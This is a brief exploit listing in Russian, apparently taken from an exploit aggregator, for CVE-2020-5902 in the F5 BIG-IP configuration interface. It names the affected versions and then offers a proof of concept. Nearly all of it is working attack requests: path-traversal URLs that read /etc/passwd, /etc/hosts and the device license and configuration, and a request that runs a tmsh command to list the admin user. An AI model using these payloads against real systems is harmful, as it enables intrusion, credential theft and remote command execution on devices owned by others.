## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YASSERJANAH-CVE-2020-5902
# CVE-2020-5902
эксплойт-код для F5-Big-IP (CVE-2020-5902)
# Сводка
В версиях BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 и 11.6.1-11.6.5.1 в Traffic Management User Interface (TMUI), также называемом утилитой Configuration, существует уязвимость удалённого выполнения кода (RCE) на нераскрытых страницах.
# Доказательство концепции
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin